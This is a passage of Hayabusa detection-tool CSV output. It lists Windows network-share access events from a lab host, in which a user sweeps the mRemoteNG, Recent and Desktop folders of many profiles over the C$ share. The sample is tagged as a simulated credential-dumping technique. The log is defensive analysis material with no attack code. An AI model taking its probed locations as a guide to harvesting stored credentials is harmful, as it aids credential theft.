admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network 
share.evtx +2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.295 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.311 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.343 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.359 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.374 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.390 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP 
Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.484 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.505 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.523 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.558 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | 